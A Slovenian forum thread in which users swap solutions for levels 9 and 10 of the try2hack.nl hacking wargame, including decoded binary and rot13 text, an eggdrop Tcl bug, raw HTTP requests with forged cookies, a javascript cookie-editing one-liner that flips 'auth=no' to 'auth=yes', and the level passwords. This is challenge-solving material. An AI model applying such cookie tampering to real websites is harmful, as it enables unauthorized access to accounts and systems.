» »

Try2Hack level9 in eggdrop quest

Try2Hack level9 in eggdrop quest

StratOS ::

Bot ma en bug :

bind ctcr - PING ctcr:pingreply proc ctcr:pingreply {nick uhost hand dest key arg} { set dur [expr [unixtime] - arg] putserv "NOTICE nick :Your ping reply took dur seconds"}

A je kermu uspel ?
To eggdrop programiranje mi je fulll v k...

Any comments regarding this ?
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

Kami ::

To je easy one.Ni ctcr, pač pa je ctcp.

Am ma kdo link od tega, od devetega levela ?

Lp

StratOS ::

Ni ga se, upam da ga bodo zopet reprogramirali :8)

http://www.try2hack.nl/
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

Zgodovina sprememb…

  • spremenila: StratOS ()

davorcek ::

Hi foolk...vem da je ta tema že zelo stara, vendar je še vedno zanimiva.
Zanima me če je keri naredo lvl 9? sedaj na 9 lvlu ni več programiranje eggdrop bota ampak je php scripta. www.try2hack.nl/levels/level9-gnapei.php
Če jo je kdo rešil bi prosil za pomoč, ker se mi je zataknilo pri njej.
LP,Davor:)
itaq bo čez 24 let padel asteroid na Zemljo....

StratOS ::

Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on
irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to conti
nue.

No pass za admin sem ti že podal, malce še avtorizacijo urediš pa bo :)

No, pa smo spet tam, kjer sem jaz ostal :)


* Now talking in #try2hack.level10
* Topic is ' Welcome to the realm of LEVEL10-??. Ph34r the awesome bot here. SHOCK AND AWE 4 U.'
* Set by raphidae on Fri Aug 06 20:04:00
-TRY2HACK- [#try2hack.level10] I am the try2hack servicebot. I'm not part of the challenges so don't try to h4x0r me.
-LEVEL10-31- [#try2hack.level10] Welcome, I am try2hack Level10! Decode the following line to proceed:
-LEVEL10-31- 010011100110100101100011011001010010000001101010011011110110001000101110001000000100111001101111011101110010000001110100011110010111000001100101001000000010011100101111011011010111001101100111001000000101010001010010010110010011001001001000010000010100001101001011001000000111001101101000011011110111011101100010011101010110011100100111001000000111010001101111001000000111001101100101011001010010000001110100011010000110010100100000011000100111010101100111
-> *TRY2HACK* showbug
-TRY2HACK- ovaq pgpe - CVAT pgpe:cvatercyl
-TRY2HACK- cebp pgpe:cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $net]
-TRY2HACK- chgfrei "ABGVPR $avpx :Lbhe cvat ercyl gbbx $qhe frpbaqf"}



z bin2text dobiš sledeče :
Nice job. Now type '/msg TRY2HACK showbug' to see the bug

za ponovno enkodiranje uporabi rot13 :
bind ctcr - PING ctcr:pingreply
proc ctcr:pingreply {nick uhost hand dest key arg} {
set dur [expr [unixtime] - $arg]
putserv "NOTICE $nick :Your ping reply took $dur seconds"}
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

Zgodovina sprememb…

  • spremenila: StratOS ()

davorcek ::

Ja ravno ta avtorizacija mi ne gre.
Sem že nekaj gledal cookije (v Firefoxu). Ko obiščeš to stran 9lvl, se ti prikažejo 3. cookiji.
1. username (admin)
2. password (yu0aertehbomb)
3. avtorizacija (auth=no)

Sedaj me pa zanima kako bi ta auth=ne spremenil v auth=yes.
Probal sem že z cookie editorjem, vendar ne gre.
LP,Davor
itaq bo čez 24 let padel asteroid na Zemljo....

rokpok ::

Fantje - res nič pametnejšega za početi?
Rad bi bil pingvin.

StratOS ::

Jup, blizu si.

Če pogledaš, kako potrka kumunikacija z serverjem z kakšnim HTTP snifferjem dobiš :

POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gn...
Accept-Language: sl
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; TheBlacksheepbrowser; .NET CLR 2.0.50215; .NET CLR 1.1.4322; InfoPath.1)
Host: www.try2hack.nl
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=

username=test&password=test&submit=Enter


no na kukijih vidiš :

str_username=admin=
str_password=yu0aertehbomb=
auth=no=


Torej moraš za uspešno avtorizacijo postati te podatke usernamea, passworda in autorizacije :


POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gn...
Accept-Language: sl
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; TheBlacksheepbrowser; .NET CLR 2.0.50215; .NET CLR 1.1.4322; InfoPath.1)
Host: www.try2hack.nl
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=yes=

username=admin&password=yu0aertehbomb&submit=Enter
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

davorcek ::

jaz te stvari ne štekam....
To pri meni ne deluje...
skopiral sem to v cmd..še prej sem napisal telnet www.try2hack.nl 80
vendar to ne dela... =(
LP,Davor
StratOS daj ti napiši meni msn naslov, da so boma lahko boljše zmenila.
itaq bo čez 24 let padel asteroid na Zemljo....

Zgodovina sprememb…

  • spremenil: davorcek ()

StratOS ::

heh, na več načinov.
Spremeniš coockie auth
to lahko narediš tudi z javascriptom.

na strani
vneseš avtorizacijske podatke ( že veš katere )

V IE naslovu kopiraš in spremeniš cockie :
javascript:void(document.cookie="auth=yes")

vnešes avt. podatke in voila :

Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to continue. See the chat page for more information.
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

Zgodovina sprememb…

  • spremenila: StratOS ()

StratOS ::

me zanima, kdo je tega rešil ? (10)
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Steam se je odločil, da ne bo več delal?

Oddelek: Igre
71455 (1237) opeter
»

refleks

Oddelek: Loža
332540 (1751) Avenger
»

Hacking

Oddelek: Programiranje
262642 (1764) ]Fusion[
»

WWW Hack ?

Oddelek: Omrežja in internet
302452 (1581) StratOS
»

Hacking tehnike

Oddelek: Omrežja in internet
321876 (1108) freejack

Več podobnih tem